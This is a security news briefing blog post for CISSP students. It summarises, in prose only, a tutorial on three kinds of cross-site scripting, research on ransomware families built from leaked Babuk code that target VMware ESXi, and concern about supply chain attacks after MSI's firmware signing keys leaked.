Blog entry by Les Bell

Les Bell
by Les Bell - Friday, 12 May 2023, 10:23 AM
Anyone in the world

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories


Tutorial Covers Three Types of XSS Attack

A rather nice little piece from Trend Micro's DevOps Resource Center provides an introduction to the three types of cross-site scripting (XSS) attacks:

  • Reflected cross-site scripting attack
  • Stored cross-site scripting attack
  • Document Object Model (DOM) cross-site scripting attack

Each of these works on the same basic principle: the threat actor inserts a malicious script into a web site - something that should be impossible if the site was performing rigorous sanitization of untrusted user input. When a victim visits the site, the script is triggered, usually downloading some malware which can then perform malicious actions on the victim's computer.

A good introduction for web developers, and about the right level of detail for CISSP exam candidates.

Trend Micro DevOps Resource Center, 3 Types of Cross-Site Scripting (XSS) Attacks, web page, 11 May 2023. Available online at https://www.trendmicro.com/en_us/devops/23/e/cross-site-scripting-xss-attacks.html.

Multiple Groups Target VMware ESXi With Ransomware

Researchers at SentinelLabs have identified 10 (yes, you read that right - ten) ransomware families, all based on the source code for Babuk, which was leaked in September 2021. Babuk was one of the earliest ransomware programs to target VMware ESXi, and when one of its developers leaked the source code for its different versions - a C++ version to attack Linux systems including ESXi, a Go language version for NAS devices and a C++ version for Windows - it allowed less skilled threat actors to adapt the code for use in their own campaigns

At first, few groups did this, however, although a few Windows derivatives did appear. But during the second half of 2022 and the beginning of 2023, things heated up, and SentinelLabs has now identified ten different ransomware families based on the Babuk source code, based on the reappearance of grammatically odd strings in the code, as well as similar file naming conventions.

SentinelLabs identified overlap between the Babuk code and ESXi lockers attributed to Conti and REvil, and also found they shared unique function name and features with the leaked Conti Windows locker source code. Apart from these two major ransomware players, smaller operators such as Ransom House's Mario have also made use of the Babuk code. This code reuse makes attribution of captured malware samples much more difficult.

The SentinelLabs report provides a full run-down of the various different derivatives, complete with comparisons of code segments. It is likely to be of most interest to malware analysts, but also provides some indicators of compromise.

Delamotte, Alex, Hypervisor Ransomware | Multiple Threat Actor Groups Hop on Leaked Babuk Code to Build ESXi Lockers, blog post, 11 May 2023. Available online at https://www.sentinelone.com/labs/hypervisor-ransomware-multiple-threat-actor-groups-hop-on-leaked-babuk-code-to-build-esxi-lockers/.

Concerns Ramp Up Over Supply Chain Attacks

The recent breach of motherboard manufacturer MSI, together with previous high-profile supply chain attacks such as SolarWinds, 3CX and others, has led to increasing concern on the part of CISO's. The Money Message ransomware gang has leaked private keys it obtained from MSI, allow malware developers to sign malicious firmware updates; if these could be inserted into the supply chain and pushed to customers, the result would be undetected very-low-level infections of millions of systems. Although there is no evidence that this has happened - so far - the possibility is concerning, if not alarming.

This concern is reflected in several recent surveys of security and IT professionals, and the message is clear: although the sky is not falling, we need to escalate efforts to secure the software supply chain.

Goodin, Dan, Leak of MSI UEFI signing keys stokes fears of “doomsday” supply chain attack, Ars Technica, 11 May 2023. Available online at https://arstechnica.com/information-technology/2023/05/leak-of-msi-uefi-signing-keys-stokes-concerns-of-doomsday-supply-chain-attack/.

Roberts, Paul, The surveys speak: supply chain threats are freaking people out, The Security Ledger, 10 May 2023. Available online at https://securityledger.com/2023/05/the-surveys-speak-supply-chain-threats-are-freaking-people-out/.


These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Creative Commons License TLP:CLEAR Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.

Tags: